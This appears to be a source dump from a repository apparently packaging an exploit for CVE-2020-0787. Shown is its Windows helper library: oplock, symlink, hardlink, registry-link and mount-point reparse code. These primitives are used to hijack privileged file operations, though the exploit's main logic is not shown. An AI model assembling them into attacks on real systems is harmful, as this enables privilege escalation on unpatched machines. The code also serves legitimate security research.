dwShareMode, nullptr, OPEN_EXISTING, 69 | flags, nullptr); 70 | if (g_hFile == INVALID_HANDLE_VALUE) { 71 | DebugPrintf("Error opening file: %d\n", GetLastError()); 72 | return false; 73 | } 74 | 75 | g_wait = CreateThreadpoolWait(WaitCallback, this, nullptr); 76 | if (g_wait == nullptr) 77 | { 78 | DebugPrintf("Error creating threadpool %d\n", GetLastError()); 79 | return false; 80 | } 81 | 82 | SetThreadpoolWait(g_wait, g_o.hEvent, nullptr); 83 | 84 | DWORD bytesReturned; 85 | 86 | if (exclusive) 87 | { 88 | DeviceIoControl(g_hFile, 89 | FSCTL_REQUEST_OPLOCK_LEVEL_1, 90 | NULL, 0, 91 | NULL, 0, 92 | &bytesReturned, 93 | &g_o); 94 | } 95 | else 96 | { 97 | DeviceIoControl(g_hFile, FSCTL_REQUEST_OPLOCK, 98 | &g_inputBuffer, sizeof(g_inputBuffer), 99 | &g_outputBuffer, sizeof(g_outputBuffer), 100 | nullptr, &g_o); 101 | } 102 | 103 | DWORD err = GetLastError(); 104 | if (err != ERROR_IO_PENDING) { 105 | DebugPrintf("Oplock Failed %d\n", err); 106 | return false; 107 | } 108 | 109 | return true; 110 | } 111 | 112 | FileOpLock* FileOpLock::CreateLock(const std::wstring& name, const std::wstring& share_mode, FileOpLock::UserCallback cb) 113 | { 114 | FileOpLock* ret = new FileOpLock(cb); 115 | DWORD dwShareMode = 0; 116 | bool exclusive = false; 117 | 118 | if (share_mode.find('r') != std::wstring::npos) 119 | { 120 | dwShareMode |= FILE_SHARE_READ; 121 | } 122 | 123 | if (share_mode.find('w') != std::wstring::npos) 124 | { 125 | dwShareMode |= FILE_SHARE_WRITE; 126 | } 127 | 128 | if (share_mode.find('d') != std::wstring::npos) 129 | { 130 | dwShareMode |= FILE_SHARE_DELETE; 131 | } 132 | 133 | if (share_mode.find('x') != std::wstring::npos) 134 | { 135 | exclusive = true; 136 | } 137 | 138 | if (ret->BeginLock(name, dwShareMode, exclusive)) 139 | { 140 | return ret; 141 | } 142 | else 143 | { 144 | delete ret; 145 | return nullptr; 146 | } 147 | } 148 | 149 | void FileOpLock::WaitForLock(UINT Timeout) 150 | { 151 | WaitForSingleObject(g_hLockCompleted, Timeout); 152 | } 153 | 154 | void FileOpLock::WaitCallback(PTP_CALLBACK_INSTANCE Instance, 155 | PVOID Parameter, PTP_WAIT Wait, 156 | TP_WAIT_RESULT WaitResult) 157 | { 158 | UNREFERENCED_PARAMETER(Instance); 159 | UNREFERENCED_PARAMETER(Wait); 160 | UNREFERENCED_PARAMETER(WaitResult); 161 | 162 | FileOpLock* lock = reinterpret_cast(Parameter); 163 | 164 | lock->DoWaitCallback(); 165 | } 166 | 167 | void FileOpLock::DoWaitCallback() 168 | { 169 | DWORD dwBytes; 170 | if (!GetOverlappedResult(g_hFile, &g_o, &dwBytes, TRUE)) { 171 | DebugPrintf("Oplock Failed\n"); 172 | } 173 | 174 | if (_cb) 175 | { 176 | _cb(); 177 | } 178 | 179 | //DebugPrintf("Closing Handle\n"); 180 | CloseHandle(g_hFile); 181 | g_hFile = INVALID_HANDLE_VALUE; 182 | SetEvent(g_hLockCompleted); 183 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/FileOpLock.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | class FileOpLock 7 | { 8 | public: 9 | typedef void(*UserCallback)(); 10 | 11 | static FileOpLock* CreateLock(const std::wstring& name, const std::wstring& share_mode, FileOpLock::UserCallback cb); 12 | void WaitForLock(UINT Timeout); 13 | 14 | ~FileOpLock(); 15 | private: 16 | 17 | HANDLE g_hFile; 18 | OVERLAPPED g_o; 19 | REQUEST_OPLOCK_INPUT_BUFFER g_inputBuffer; 20 | REQUEST_OPLOCK_OUTPUT_BUFFER g_outputBuffer; 21 | HANDLE g_hLockCompleted; 22 | PTP_WAIT g_wait; 23 | UserCallback _cb; 24 | 25 | FileOpLock(UserCallback cb); 26 | 27 | static void CALLBACK WaitCallback(PTP_CALLBACK_INSTANCE Instance, 28 | PVOID Parameter, PTP_WAIT Wait, 29 | TP_WAIT_RESULT WaitResult); 30 | 31 | void DoWaitCallback(); 32 | 33 | bool BeginLock(const std::wstring& name, DWORD dwShareMode, bool exclusive); 34 | 35 | }; 36 | 37 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/FileSymlink.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "FileSymlink.h" 17 | 18 | #include 19 | #include "ReparsePoint.h" 20 | #include "CommonUtils.h" 21 | 22 | FileSymlink::FileSymlink(bool permanent) 23 | : m_created_junction(false), m_hlink(nullptr), m_permanent(permanent) 24 | { 25 | } 26 | 27 | FileSymlink::FileSymlink() : FileSymlink(false) 28 | { 29 | } 30 | 31 | FileSymlink::~FileSymlink() 32 | { 33 | if (!m_permanent) 34 | { 35 | if (m_hlink) 36 | { 37 | CloseHandle(m_hlink); 38 | } 39 | 40 | if (m_created_junction) 41 | { 42 | RemoveDirectory(m_junctiondir); 43 | } 44 | } 45 | } 46 | 47 | bstr_t GetNativePath(LPCWSTR name, PBOOL isnative) 48 | { 49 | if (name[0] == '@') 50 | { 51 | *isnative = TRUE; 52 | return name + 1; 53 | } 54 | else 55 | { 56 | *isnative = FALSE; 57 | std::vector buf(32 * 1024); 58 | 59 | if (GetFullPathNameW(name, buf.size(), &buf[0], nullptr) == 0) 60 | { 61 | return L""; 62 | } 63 | 64 | return &buf[0]; 65 | } 66 | } 67 | 68 | FileSymlink::FileSymlink(FileSymlink&& other) 69 | { 70 | m_created_junction = other.m_created_junction; 71 | m_hlink = other.m_hlink; 72 | m_junctiondir = other.m_junctiondir; 73 | m_linkname = other.m_linkname; 74 | m_target = other.m_target; 75 | 76 | other.m_created_junction = false; 77 | other.m_hlink = nullptr; 78 | } 79 | 80 | FileSymlink& FileSymlink::operator=(FileSymlink&& other) 81 | { 82 | m_created_junction = other.m_created_junction; 83 | m_hlink = other.m_hlink; 84 | m_junctiondir = other.m_junctiondir; 85 | m_linkname = other.m_linkname; 86 | m_target = other.m_target; 87 | 88 | other.m_created_junction = false; 89 | other.m_hlink = nullptr; 90 | 91 | return *this; 92 | } 93 | 94 | static void RemovePermanentSymlink(LPCWSTR symlink, LPCWSTR target) 95 | { 96 | DefineDosDeviceW(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | 97 | DDD_EXACT_MATCH_ON_REMOVE, symlink, target); 98 | DefineDosDeviceW(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | 99 | DDD_EXACT_MATCH_ON_REMOVE, symlink, target); 100 | } 101 | 102 | static bool CreatePermanentSymlink(LPCWSTR symlink, LPCWSTR target) 103 | { 104 | if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, symlink, target) 105 | && DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, symlink, target)) 106 | { 107 | return true; 108 | } 109 | return false; 110 | } 111 | 112 | bool FileSymlink::CreateSymlink(LPCWSTR xsymlink, LPCWSTR xtarget, LPCWSTR xbaseobjdir) 113 | { 114 | bstr_t symlink = xsymlink; 115 | bstr_t baseobjdir = L"\\RPC Control"; 116 | 117 | if (xbaseobjdir) 118 | { 119 | baseobjdir = xbaseobjdir; 120 | } 121 | 122 | BOOL isnative; 123 | 124 | bstr_t linkname = GetNativePath(symlink, &isnative); 125 | if (linkname.length() == 0) 126 | { 127 | return 1; 128 | } 129 | 130 | if (!isnative) 131 | { 132 | wchar_t* slash = wcsrchr(symlink.GetBSTR(), L'\\'); 133 | if (slash == nullptr) 134 | { 135 | DebugPrintf("Error must supply a directory and link name\n"); 136 | return false; 137 | } 138 | 139 | linkname = baseobjdir + slash; 140 | 141 | *slash = 0; 142 | 143 | m_junctiondir = symlink; 144 | 145 | if (!CreateDirectory(m_junctiondir, nullptr) && GetLastError() != ERROR_ALREADY_EXISTS) 146 | { 147 | DebugPrintf("Couldn't create symlink directory\n"); 148 | return false; 149 | } 150 | 151 | bstr_t destdir = baseobjdir; 152 | 153 | if (!ReparsePoint::CreateMountPoint(m_junctiondir.GetBSTR(), destdir.GetBSTR(), L"")) 154 | { 155 | DebugPrintf("Error creating junction %d\n", ReparsePoint::GetLastError()); 156 | return false; 157 | } 158 | 159 | m_created_junction = true; 160 | } 161 | 162 | bstr_t target = GetNativePath(xtarget, &isnative); 163 | if (target.length() == 0) 164 | { 165 | return false; 166 | } 167 | 168 | if (!isnative) 169 | { 170 | target = L"\\??\\" + target; 171 | } 172 | 173 | if (m_permanent) 174 | { 175 | linkname = L"Global\\GLOBALROOT" + linkname; 176 | 177 | if (!CreatePermanentSymlink(linkname, target)) 178 | { 179 | DebugPrintf("Error creating symlink %ls\n", GetErrorMessage().c_str()); 180 | return false; 181 | } 182 | } 183 | else 184 | { 185 | m_hlink = ::CreateSymlink(nullptr, linkname, target); 186 | if (!m_hlink) 187 | { 188 | return false; 189 | } 190 | } 191 | 192 | m_linkname = linkname; 193 | m_target = target; 194 | 195 | return true; 196 | } 197 | 198 | 199 | bool FileSymlink::ChangeSymlink(LPCWSTR newtarget) 200 | { 201 | BOOL isnative; 202 | 203 | bstr_t target = GetNativePath(newtarget, &isnative); 204 | if (target.length() == 0) 205 | { 206 | return false; 207 | } 208 | 209 | if (!isnative) 210 | { 211 | target = L"\\??\\" + target; 212 | } 213 | 214 | if (m_permanent) 215 | { 216 | RemovePermanentSymlink(m_linkname, m_target); 217 | if (!CreatePermanentSymlink(m_linkname, target)) 218 | { 219 | return false; 220 | } 221 | } 222 | else 223 | { 224 | if (!m_hlink) 225 | { 226 | SetLastError(ERROR_INVALID_PARAMETER); 227 | return false; 228 | } 229 | 230 | CloseHandle(m_hlink); 231 | m_hlink = nullptr; 232 | 233 | 234 | m_hlink = ::CreateSymlink(nullptr, m_linkname, target); 235 | if (!m_hlink) 236 | { 237 | return false; 238 | } 239 | } 240 | 241 | m_target = target; 242 | 243 | return true; 244 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/FileSymlink.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | class FileSymlink 5 | { 6 | bstr_t m_junctiondir; 7 | bstr_t m_linkname; 8 | bstr_t m_target; 9 | bool m_created_junction; 10 | HANDLE m_hlink; 11 | bool m_permanent; 12 | 13 | public: 14 | FileSymlink(bool permanent); 15 | FileSymlink(); 16 | FileSymlink(FileSymlink&& other); 17 | FileSymlink& operator=(FileSymlink&& other); 18 | FileSymlink(const FileSymlink& other) = delete; 19 | FileSymlink& operator=(const FileSymlink& other) = delete; 20 | 21 | bool CreateSymlink(LPCWSTR symlink, LPCWSTR target, LPCWSTR baseobjdir); 22 | bool ChangeSymlink(LPCWSTR newtarget); 23 | 24 | ~FileSymlink(); 25 | }; 26 | 27 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/Hardlink.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "CommonUtils.h" 17 | #include "ntimports.h" 18 | #include "typed_buffer.h" 19 | 20 | bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname) 21 | { 22 | std::wstring full_linkname = BuildFullPath(linkname, true); 23 | size_t len = full_linkname.size() * sizeof(WCHAR); 24 | 25 | typed_buffer_ptr link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR)); 26 | 27 | memcpy(&link_info->FileName[0], full_linkname.c_str(), len); 28 | link_info->ReplaceIfExists = TRUE; 29 | link_info->FileNameLength = len; 30 | 31 | std::wstring full_targetname = BuildFullPath(targetname, true); 32 | 33 | HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0); 34 | if (hFile) 35 | { 36 | DEFINE_NTDLL(ZwSetInformationFile); 37 | IO_STATUS_BLOCK io_status = { 0 }; 38 | 39 | NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation); 40 | CloseHandle(hFile); 41 | if (NT_SUCCESS(status)) 42 | { 43 | return true; 44 | } 45 | SetNtLastError(status); 46 | } 47 | 48 | return false; 49 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/NativeSymlink.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "CommonUtils.h" 17 | #include "ntimports.h" 18 | 19 | HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname) 20 | { 21 | DEFINE_NTDLL(RtlInitUnicodeString); 22 | DEFINE_NTDLL(NtCreateSymbolicLinkObject); 23 | 24 | OBJECT_ATTRIBUTES objAttr; 25 | UNICODE_STRING name; 26 | UNICODE_STRING target; 27 | 28 | fRtlInitUnicodeString(&name, linkname); 29 | fRtlInitUnicodeString(&target, targetname); 30 | 31 | InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, root, nullptr); 32 | 33 | HANDLE hLink; 34 | 35 | NTSTATUS status = fNtCreateSymbolicLinkObject(&hLink, 36 | SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target); 37 | if (status == 0) 38 | { 39 | //DebugPrintf("Opened Link %ls -> %ls: %p\n", linkname, targetname, hLink); 40 | return hLink; 41 | } 42 | else 43 | { 44 | SetLastError(NtStatusToDosError(status)); 45 | return nullptr; 46 | } 47 | } 48 | 49 | HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname) 50 | { 51 | DEFINE_NTDLL(RtlInitUnicodeString); 52 | DEFINE_NTDLL(NtOpenSymbolicLinkObject); 53 | 54 | OBJECT_ATTRIBUTES objAttr; 55 | UNICODE_STRING name; 56 | 57 | fRtlInitUnicodeString(&name, linkname); 58 | 59 | InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, root, nullptr); 60 | 61 | HANDLE hLink; 62 | 63 | NTSTATUS status = fNtOpenSymbolicLinkObject(&hLink, 64 | SYMBOLIC_LINK_ALL_ACCESS, &objAttr); 65 | if (status == 0) 66 | { 67 | return hLink; 68 | } 69 | else 70 | { 71 | SetLastError(NtStatusToDosError(status)); 72 | return nullptr; 73 | } 74 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/RegistrySymlink.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include "CommonUtils.h" 21 | 22 | #define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L) 23 | #define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L) 24 | 25 | typedef NTSTATUS(__stdcall *fNtCreateKey)( 26 | PHANDLE KeyHandle, 27 | ULONG DesiredAccess, 28 | POBJECT_ATTRIBUTES ObjectAttributes, 29 | ULONG TitleIndex, 30 | PUNICODE_STRING Class, 31 | ULONG CreateOptions, 32 | PULONG Disposition 33 | ); 34 | 35 | typedef NTSTATUS (__stdcall *fNtOpenKeyEx)( 36 | PHANDLE KeyHandle, 37 | ACCESS_MASK DesiredAccess, 38 | POBJECT_ATTRIBUTES ObjectAttributes, 39 | ULONG OpenOptions 40 | ); 41 | 42 | 43 | typedef NTSTATUS(__stdcall *fNtSetValueKey)( 44 | HANDLE KeyHandle, 45 | PUNICODE_STRING ValueName, 46 | ULONG TitleIndex, 47 | ULONG Type, 48 | PVOID Data, 49 | ULONG DataSize 50 | ); 51 | 52 | typedef NTSTATUS(__stdcall *fNtDeleteKey)( 53 | HANDLE KeyHandle 54 | ); 55 | 56 | typedef NTSTATUS(__stdcall *fNtClose)( 57 | HANDLE Handle 58 | ); 59 | 60 | FARPROC GetProcAddressNT(LPCSTR lpName); 61 | 62 | typedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); 63 | 64 | static bstr_t GetUserSid() 65 | { 66 | HANDLE hToken; 67 | 68 | OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken); 69 | 70 | DWORD dwSize; 71 | 72 | GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize); 73 | 74 | std::vector userbuffer(dwSize); 75 | 76 | GetTokenInformation(hToken, TokenUser, &userbuffer[0], dwSize, &dwSize); 77 | 78 | PTOKEN_USER user = reinterpret_cast(&userbuffer[0]); 79 | 80 | LPWSTR lpUser; 81 | bstr_t ret = L""; 82 | 83 | if (ConvertSidToStringSid(user->User.Sid, &lpUser)) 84 | { 85 | ret = lpUser; 86 | LocalFree(lpUser); 87 | } 88 | 89 | return ret; 90 | } 91 | 92 | static bstr_t RegPathToNative(LPCWSTR lpPath) 93 | { 94 | bstr_t regpath = L"\\Registry\\"; 95 | 96 | // Already native rooted 97 | if (lpPath[0] == '\\') 98 | { 99 | return lpPath; 100 | } 101 | 102 | if (_wcsnicmp(lpPath, L"HKLM\\", 5) == 0) 103 | { 104 | return regpath + L"Machine\\" + &lpPath[5]; 105 | } 106 | else if (_wcsnicmp(lpPath, L"HKU\\", 4) == 0) 107 | { 108 | return regpath + L"User\\" + &lpPath[4]; 109 | } 110 | else if (_wcsnicmp(lpPath, L"HKCU\\", 5) == 0) 111 | { 112 | return regpath + L"User\\" + GetUserSid() + L"\\" + &lpPath[5]; 113 | } 114 | else 115 | { 116 | DebugPrintf("Registry path %ls must be absolute or start with HKLM, HKU or HKCU\n"); 117 | return L""; 118 | } 119 | } 120 | 121 | bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile) 122 | { 123 | bstr_t symlink = RegPathToNative(lpSymlink); 124 | bstr_t target = RegPathToNative(lpTarget); 125 | 126 | if (symlink.length() == 0 || target.length() == 0) 127 | { 128 | return false; 129 | } 130 | 131 | DebugPrintf("Creating registry link from %ls to %ls\n", symlink.GetBSTR(), target.GetBSTR()); 132 | 133 | fNtCreateKey pfNtCreateKey = (fNtCreateKey)GetProcAddressNT("NtCreateKey"); 134 | fNtSetValueKey pfNtSetValueKey = (fNtSetValueKey)GetProcAddressNT("NtSetValueKey"); 135 | fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT("RtlInitUnicodeString"); 136 | 137 | OBJECT_ATTRIBUTES obj_attr; 138 | UNICODE_STRING name; 139 | 140 | pfRtlInitUnicodeString(&name, symlink); 141 | InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr); 142 | HANDLE hKey; 143 | ULONG disposition; 144 | 145 | NTSTATUS status = pfNtCreateKey(&hKey, KEY_ALL_ACCESS, &obj_attr, 0, nullptr, 146 | INTERNAL_REG_OPTION_CREATE_LINK | (bVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE), &disposition); 147 | 148 | if (status == 0) 149 | { 150 | UNICODE_STRING value_name; 151 | 152 | pfRtlInitUnicodeString(&value_name, L"SymbolicLinkValue"); 153 | 154 | status = pfNtSetValueKey(hKey, &value_name, 0, REG_LINK, target.GetBSTR(), target.length() * sizeof(WCHAR)); 155 | CloseHandle(hKey); 156 | 157 | if (status != 0) 158 | { 159 | SetLastError(NtStatusToDosError(status)); 160 | return false; 161 | } 162 | } 163 | else 164 | { 165 | SetLastError(NtStatusToDosError(status)); 166 | return false; 167 | } 168 | 169 | return true; 170 | } 171 | 172 | bool DeleteRegSymlink(LPCWSTR lpSymlink) 173 | { 174 | fNtOpenKeyEx pfNtOpenKeyEx = (fNtOpenKeyEx)GetProcAddressNT("NtOpenKeyEx"); 175 | fNtDeleteKey pfNtDeleteKey = (fNtDeleteKey)GetProcAddressNT("NtDeleteKey"); 176 | fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT("RtlInitUnicodeString"); 177 | 178 | OBJECT_ATTRIBUTES obj_attr; 179 | UNICODE_STRING name; 180 | 181 | bstr_t symlink = RegPathToNative(lpSymlink); 182 | 183 | if (symlink.length() == 0) 184 | { 185 | return false; 186 | } 187 | 188 | pfRtlInitUnicodeString(&name, symlink); 189 | 190 | InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr); 191 | 192 | HANDLE hKey; 193 | NTSTATUS status = pfNtOpenKeyEx(&hKey, DELETE, &obj_attr, 0); 194 | if (status == 0) 195 | { 196 | status = pfNtDeleteKey(hKey); 197 | CloseHandle(hKey); 198 | 199 | if (status != 0) 200 | { 201 | SetLastError(NtStatusToDosError(status)); 202 | return false; 203 | } 204 | } 205 | else 206 | { 207 | SetLastError(NtStatusToDosError(status)); 208 | 209 | return false; 210 | } 211 | 212 | return true; 213 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/ReparsePoint.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "ReparsePoint.h" 17 | #include "ScopedHandle.h" 18 | #include "typed_buffer.h" 19 | #include 20 | #include 21 | 22 | // Taken from ntifs.h 23 | #define SYMLINK_FLAG_RELATIVE 1 24 | 25 | typedef struct _REPARSE_DATA_BUFFER { 26 | ULONG ReparseTag; 27 | USHORT ReparseDataLength; 28 | USHORT Reserved; 29 | union { 30 | struct { 31 | USHORT SubstituteNameOffset; 32 | USHORT SubstituteNameLength; 33 | USHORT PrintNameOffset; 34 | USHORT PrintNameLength; 35 | ULONG Flags; 36 | WCHAR PathBuffer[1]; 37 | } SymbolicLinkReparseBuffer; 38 | struct { 39 | USHORT SubstituteNameOffset; 40 | USHORT SubstituteNameLength; 41 | USHORT PrintNameOffset; 42 | USHORT PrintNameLength; 43 | WCHAR PathBuffer[1]; 44 | } MountPointReparseBuffer; 45 | struct { 46 | UCHAR DataBuffer[1]; 47 | } GenericReparseBuffer; 48 | } DUMMYUNIONNAME; 49 | } REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER; 50 | 51 | #define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer) 52 | 53 | #define IO_REPARSE_TAG_MOUNT_POINT (0xA0000003L) // winnt 54 | #define IO_REPARSE_TAG_HSM (0xC0000004L) // winnt 55 | #define IO_REPARSE_TAG_DRIVE_EXTENDER (0x80000005L) 56 | #define IO_REPARSE_TAG_HSM2 (0x80000006L) // winnt 57 | #define IO_REPARSE_TAG_SIS (0x80000007L) // winnt 58 | #define IO_REPARSE_TAG_WIM (0x80000008L) // winnt 59 | #define IO_REPARSE_TAG_CSV (0x80000009L) // winnt 60 | #define IO_REPARSE_TAG_DFS (0x8000000AL) // winnt 61 | #define IO_REPARSE_TAG_FILTER_MANAGER (0x8000000BL) 62 | #define IO_REPARSE_TAG_SYMLINK (0xA000000CL) // winnt 63 | #define IO_REPARSE_TAG_IIS_CACHE (0xA0000010L) 64 | #define IO_REPARSE_TAG_DFSR (0x80000012L) // winnt 65 | #define IO_REPARSE_TAG_DEDUP (0x80000013L) // winnt 66 | #define IO_REPARSE_TAG_APPXSTRM (0xC0000014L) 67 | #define IO_REPARSE_TAG_NFS (0x80000014L) // winnt 68 | #define IO_REPARSE_TAG_FILE_PLACEHOLDER (0x80000015L) // winnt 69 | #define IO_REPARSE_TAG_DFM (0x80000016L) 70 | #define IO_REPARSE_TAG_WOF (0x80000017L) // winnt 71 | 72 | static int g_last_error = 0; 73 | 74 | int ReparsePoint::GetLastError() 75 | { 76 | return g_last_error; 77 | } 78 | 79 | ScopedHandle OpenReparsePoint(const std::wstring& path, bool writable) 80 | { 81 | HANDLE h = CreateFile(path.c_str(), 82 | GENERIC_READ | (writable ? GENERIC_WRITE : 0), 83 | 0, 84 | 0, 85 | OPEN_EXISTING, 86 | FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, 87 | 0); 88 | 89 | if (h == INVALID_HANDLE_VALUE) 90 | { 91 | g_last_error = GetLastError(); 92 | } 93 | 94 | return ScopedHandle(h, false); 95 | } 96 | 97 | static bool SetReparsePoint(const ScopedHandle& handle, typed_buffer_ptr& reparse_buffer) 98 | { 99 | DWORD cb; 100 | if (!handle.IsValid()) { 101 | return false; 102 | } 103 | 104 | bool ret = DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT, 105 | reparse_buffer, reparse_buffer.size(), nullptr, 0, &cb, nullptr) == TRUE; 106 | if (!ret) 107 | { 108 | g_last_error = GetLastError(); 109 | } 110 | 111 | return ret; 112 | } 113 | 114 | static bool DeleteReparsePoint(const ScopedHandle& handle, PREPARSE_GUID_DATA_BUFFER reparse_buffer) 115 | { 116 | DWORD cb; 117 | if (!handle.IsValid()) { 118 | return false; 119 | } 120 | 121 | bool ret = DeviceIoControl(handle, 122 | FSCTL_DELETE_REPARSE_POINT, 123 | reparse_buffer, 124 | REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, 125 | nullptr, 126 | 0, 127 | &cb, 128 | 0) == TRUE; 129 | 130 | if (!ret) 131 | { 132 | g_last_error = GetLastError(); 133 | } 134 | 135 | return ret; 136 | } 137 | 138 | typed_buffer_ptr BuildMountPoint(const std::wstring& target, const std::wstring& printname) 139 | { 140 | const size_t target_byte_size = target.size() * 2; 141 | const size_t printname_byte_size = printname.size() * 2; 142 | const size_t path_buffer_size = target_byte_size + printname_byte_size + 8 + 4; 143 | const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH; 144 | typed_buffer_ptr buffer(total_size); 145 | 146 | buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; 147 | buffer->ReparseDataLength = static_cast(path_buffer_size); 148 | buffer->Reserved = 0; 149 | 150 | buffer->MountPointReparseBuffer.SubstituteNameOffset = 0; 151 | buffer->MountPointReparseBuffer.SubstituteNameLength = static_cast(target_byte_size); 152 | memcpy(buffer->MountPointReparseBuffer.PathBuffer, target.c_str(), target_byte_size + 2); 153 | buffer->MountPointReparseBuffer.PrintNameOffset = static_cast(target_byte_size + 2); 154 | buffer->MountPointReparseBuffer.PrintNameLength = static_cast(printname_byte_size); 155 | memcpy(buffer->MountPointReparseBuffer.PathBuffer + target.size() + 1, printname.c_str(), printname_byte_size + 2); 156 | 157 | return buffer; 158 | } 159 | 160 | typed_buffer_ptr BuildSymlink(const std::wstring& target, const std::wstring& printname, bool relative) 161 | { 162 | const size_t target_byte_size = target.size() * 2; 163 | const size_t printname_byte_size = printname.size() * 2; 164 | const size_t path_buffer_size = target_byte_size + printname_byte_size + 12 + 4; 165 | const size_t total_size = path_buffer_size + REPARSE_DATA_BUFFER_HEADER_LENGTH; 166 | typed_buffer_ptr buffer(total_size); 167 | 168 | buffer->ReparseTag = IO_REPARSE_TAG_SYMLINK; 169 | buffer->ReparseDataLength = static_cast(path_buffer_size); 170 | buffer->Reserved = 0; 171 | 172 | buffer->SymbolicLinkReparseBuffer.SubstituteNameOffset = 0; 173 | buffer->SymbolicLinkReparseBuffer.SubstituteNameLength = static_cast(target_byte_size); 